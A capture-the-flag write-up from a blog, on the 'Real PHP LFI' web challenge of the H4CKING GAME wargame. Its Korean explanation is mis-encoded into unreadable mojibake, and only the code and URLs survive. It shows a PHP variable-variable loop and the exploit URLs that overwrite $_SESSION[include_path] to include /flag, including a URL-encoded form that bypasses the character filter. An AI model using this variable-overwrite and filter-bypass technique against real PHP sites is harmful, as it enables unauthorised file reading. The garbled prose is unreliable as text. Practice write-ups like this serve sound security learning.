wargame ๐Ÿด‍โ˜ ๏ธ write-up/H4CKING GAME

[Web Hacking] Real PHP LFI

Kortsec1 2025. 1. 2. 01:15

0x01 ๋ฌธ์ œ ์„ค๋ช…


0x02 ํ’€์ด ๊ณผ์ •

์ฒจ๋ถ€๋œ ์†Œ์Šค์ฝ”๋“œ๋ฅผ ๋ณด๋ฉด, index.php ์—์„œ $_SERVER[’QUERY_STRING’] ์„ ํ†ตํ•ด ์ฟผ๋ฆฌ ์ •๋ณด๋ฅผ ๋ฐ›์•„์˜ค๊ณ , config.php ์—์„œ ๋ฌธ์ž ํ•„ํ„ฐ๋ง์„ ์ง„ํ–‰ํ•œ๋‹ค. ๋งˆ์ง€๋ง‰์—๋Š” include($_SESSION['include_path']) ๋กœ nav.php ๋ฅผ ๋ถˆ๋Ÿฌ์˜จ๋‹ค. ์ทจ์•ฝ์ ์€ index.php ์—์„œ ๋ฐœ์ƒํ•œ๋‹ค.

foreach($arr as $key=>$value){
    $$key = fuck_path_change_or_check($value);
}

$$ ๋Š” php์˜ ๊ฐ€๋ณ€๋ณ€์ˆ˜ ์„ ์–ธ ์‹œ ์‚ฌ์šฉํ•˜๋Š” ๊ตฌ๋ฌธ์ด๋‹ค. ์—ฌ๊ธฐ์„œ $_SESSION[’include_path’] ์„ ๋ฎ๋Š”๋‹ค๋ฉด ์›ํ•˜๋Š” ๋กœ์ปฌ ํŒŒ์ผ์„ ๋ถˆ๋Ÿฌ์˜ฌ ์ˆ˜ ์žˆ๋‹ค.

GET ํŒŒ๋ผ๋ฏธํ„ฐ๋ฅผ ํ†ตํ•ด ๊ณต๊ฒฉ์„ ์ˆ˜ํ–‰ํ•˜์˜€๋‹ค. GET ํŒŒ๋ผ๋ฏธํ„ฐ๋Š” ๋ฐฐ์—ด, ๋”•์…”๋„ˆ๋ฆฌ ๋˜ํ•œ ๊ฐ’์œผ๋กœ ์ „๋‹ฌํ•  ์ˆ˜ ์žˆ๋‹ค. ์ด๋ฅผํ…Œ๋ฉด ์•„๋ž˜์™€ ๊ฐ™์€ ์‹์ด๋‹ค.

abcd.com?array[a]=1&array[b]=2

array(
[a] => 1
[b] => 2
)

http://web.h4ckingga.me:10013?_SESSION[include_path]=/flag

ํ•„ํ„ฐ๋ง์„ ์šฐํšŒํ•ด์•ผ ํ•œ๋‹ค. _ , SESSION ๊ทธ๋ฆฌ๊ณ  / ๊ฐ€ ํ•„ํ„ฐ๋ง ๋˜๊ณ ์žˆ์–ด, URL encoding ํ•˜์—ฌ ์šฐํšŒํ•˜์˜€๋‹ค.

http://web.h4ckingga.me:10013?%5f%53ESSION[include%5fpath]=%2fflag

0x03 ๊ฒฐ๊ณผ ํ™•์ธ

  • FLAG
  • H4CGM{adsfasdfadsfadsfasdfasdf}


0x04 ํšŒ๊ณ  ๋ฐ ์ฐธ๊ณ  ๋‚ด์šฉ

๋ณต์žกํ•œ ์ดํ•ด ์—†์ด ๋‹จ์ˆœํ•˜๊ฒŒ ์ƒ๊ฐํ•˜๋‹ˆ ํ’€๋ฆฐ ๋ฌธ์ œ์˜€๋‹ค. ํ•„ํ„ฐ๋ง์— ๊ด€ํ•˜์—ฌ ์ฐจ์ธฐ ์ •๋ฆฌํ•ด์•ผ๊ฒ ๋‹ค๋Š” ์ƒ๊ฐ์ด ๋“ค์—ˆ๋‹ค.

'wargame ๐Ÿดโ€โ˜ ๏ธ write-up > H4CKING GAME' ์นดํ…Œ๊ณ ๋ฆฌ์˜ ๋‹ค๋ฅธ ๊ธ€

[Web Hacking] Calculator v2  (0) 2025.01.02
[Web Hacking] Smuggling  (0) 2024.12.30
[Web Hacking] Calculator  (1) 2024.12.19